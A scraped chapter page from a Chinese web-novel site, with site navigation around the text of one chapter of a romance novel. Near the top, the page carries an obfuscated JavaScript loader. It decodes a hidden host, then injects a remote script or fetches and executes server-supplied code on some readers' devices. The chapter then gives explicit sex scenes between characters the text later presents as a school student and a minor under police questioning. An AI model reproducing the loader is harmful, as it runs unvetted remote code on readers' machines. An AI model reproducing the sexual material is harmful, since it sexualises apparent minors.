98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

035横生(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('035横生

如此极致的性爱是毕生难忘的,晚栀几乎任他予取予求,不再压抑反应,喘息、声音、力度,这一整晚他们尝试了许多姿势,颠鸾倒凤,四肢紧缠。

抵死缠绵,谁也不肯放过谁。

躁动粒子稍稍落地,凌晨五点多,沉闷响起忐忑的敲门声,奚扬拉过被子盖住大片的裸背,陷入短暂睡眠的人儿毫无动静。

白鹤在门口悄悄道歉:“我真没办法,你老不接,都打我这儿好几遍了。”

奚扬结果手机,按段震动的手机:“你可以走了。”

“不是我多嘴啊,这么不搭理也没办法,那边要是再过来添几把火,您那位再有个什么万一,就不知道还有没有这么好运了。”

手机再次震动,奚扬关门走到窗边:“你打过来不知道有时差?”明明白日将至,天色却像是世上最浓的黑。

“事情完了我会回去。”磁性的嗓音从情欲中清醒,在这至暗时刻尤为冷冽。

“这事我来了结,你们不要插手了。”

“别忘了,这也算你挑起来的。”

“她会一起。”

那边似是在说什么,时间很久,久到黑眸里映入几缕深沉暮色。

熹微晨光意图划破暗黑夜色,难看极了。

奚扬有节奏地敲着栏杆,悠闲地拉上窗帘:“她只有这一个选择。”

挂掉通话,凝视那一道莹白的肩,那才是他喜爱的色彩。

许是被他身上的冷气扰到,他一躺回床上晚栀就瑟缩起来,膝盖不耐地在他身上磨,哑掉的嗓子带着慵懒的颓废:“冷死了冷死了!”

天旋地转,突然炙热的滑入非常顺畅,晚栀睁大眼对上深沉的黑眸:“热不热?”上方的少年是好整以暇的闲适,难以联想到,他不久前还伏在她身上、喉咙迷乱地发出炙热的闷哼。

意乱情迷是短暂的,冷静清醒是一直的。

白皙笔直的双腿在皮肤紧贴的温热中缓缓勾起,在奚扬腰侧蹭着,晚栀眯起眼睛,在身上撞击中收缩小腹:“好热……好大……啊……好胀啊……”

去他妈的清醒。

脖颈软舌温润的舔咬勾得他心痒,节奏不断地迈向疯狂的边缘。奚扬耐不住地起身抱着她找东西,随手扔掉用空的大纸盒:“没了。”

坐在床头柜上的晚栀正投入,不满他的突然退出,再次在他颈侧用力吸吮,奚扬抱着她叠坐在床上快速挺动几下,手指跟着在外头的唇珠上磨动。

晚栀受不住仰头地直视湿发下的黑眸伸出粉舌,他低头含住与之交缠,嘴唇张到最大,双舌大肆交换彼此的气息、温度、力道,吸吮彼此的津液。

“让我出来。”奚扬在她痛快的倾泻后强忍着欲望拉开后腰的腿,晚栀以为他是让她打开腿换姿势:“……嗯?”拉开之后两人惧是一哼。

“让我出来。”额头的汗滴在她身上,晚栀顺着他的视线往下。

性器的头部卡在窄小的甬道口,里面粉红的嫩肉被带出附着在硕大的表面,像是她不依不饶咬住他不放。

晚栀急忙握住往后一退,正欲松开的手被按住,嗓子忍耐得粗嘎:“别动,避孕套用完了。”

最后这么一闹她手都酸了都没弄出来,累得趴在床上帮他口。

颜射。

该玩的都玩了。

一片狼藉。

“我要洗澡,不睡床了睡沙发吧。”

“沙发上也是……”

“我们去隔壁房间。”

他会一直记得这个深刻的夜晚,他想她就是要让他永远记得。

深入骨髓,在心间漾开,似痒非痒引人不时回味。

日上三竿,晚栀轻轻拉开胸前的手,转头在颈边的线条完美的侧脸送上一吻,起身到隔壁换上最后一套新制服、洗漱、遮住眼下的青黑。

狂欢之后,穿过杯盘狼藉的客厅,拧开大门。

太阳照常升起。

再见。

——

美利坚的短期旅游变成长久居住,已成少妇又恢复单身的妈妈脸上出现少女般的羞涩:“I found my love.”

尽管为父母不能复合而遗憾,晚栀也由衷地替她开心: “你不用为了作我妈妈而苦恼,你永远可以先作你自己,我希望你快乐。”

——

白色头纱下的新娘状态是她从未见过的饱满:“谢谢你参加我的婚礼,漂亮花童。”

晚栀小小个头,在一旁仰视,她亲爱的妈妈走向新郎,祝福她从此以后被幸福包围。

——

“I love you.”小手被一根根掰开,妈妈在她额头用力地亲吻,面容近到模糊,“Always be happy and free.”

极度诧异又焦急的哭腔:“妈妈……”慌乱得口不择言。

拉住、被睁开、再拉住、再被睁开……

触觉消失的那一刻,一切的兵荒马乱都被静了音。

不回头的背影,一如手挽她心爱的新郎接受神父的祝福时,虔诚而坚定。

鼻间花香依旧,永恒的爱与约定,这是栀子花语,不属于虞晚栀。

平安喜乐。

留她一人,平安。

白纱之下,一切荣耀与罪恶都化为灰烬,幸存者的人生成了灰色,高悬于崖,摇摇欲坠,接受“黑与白”的审判。

信息一发出,胡铭那边动作很快,晚栀穿着整齐的学校制服审讯室外:“我……”

“和晚栀没关系。”匆匆赶来的奚扬打断晚栀,气息有点急,衣服不算整齐,衬衫领口散开,密集的吻痕若隐若现,黑眸里的笃定带着催眠的力量:“你一定累了,我们回去……”恍若无人的态度让胡铭等人瞠目:“我不知道你怎么进来,但你这是妨碍公务。”

奚扬本不打断搭理,但一旁挪开的步子让他眼底一冷,面上礼貌地询问:“审讯未成年也得有个陪审监护人不是吗?”

“她班主任正在路上。”

“据我所知,她的亲生父亲还健在。”

“虞晚栀的父亲现在正在国外……”

突兀的手机铃声几人的对峙。

“您好,我是洛佩兹。”兰德的前妻,胡铭不知为何看了面前人一眼,迟疑对电话那边回:“……您好。”

几人都凝神看过了,就晚栀不动声色地瞥了眼奚扬,他正好整以暇地整理衣领,唇角微微勾起,似是静待事态发生。

“我是兰德的前妻,兰德文化的管理人,我们并不打算对兰德先生生前的私事进行任何申诉。”

洛佩兹一行赶到后,审讯室内精彩纷呈。

“关于网上的热帖……”

洛佩兹承认得很干脆,满是干练的女强人姿态:“是我封锁的,如果任由它发展,舆论导向会影响整个展馆的运营。”兰德先生的个人形象和他们现在运营的文化产业息息相关,牵一发而动全身,不能让事态朝不利于他们的方向发展。

胡铭照旧掏出一叠东西:“那照片呢?”

为首的一张,其实也只有脖子以上的地方,女孩正抬着下巴躺在流理台上,眼睛向上,用读不懂是什么情感的眼神看着眼前那个“人”,细节的近景表露某种微妙的罪恶。

“那不过是某种……行为艺术。”洛佩兹边整理思绪边答道,尽管她对兰德生前种种劣迹颇为不屑,她觉得那不过是打着“艺术家”名头的幌子,但此时却不得不硬着头皮“解释”,见到欲打断她的几人便强硬地提高音量,“这当然是不好的,后面以后也被纠正了,孩子们现在成长得很好。”

“逝者已矣,我想这对孩子们来说再提起也不是什么好事。”

“基本的隐私保护你们可以做到吧?”

胡铭:“我不得不打断一下,您仅仅是兰德文化的管理人,但并不代表兰德家族。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间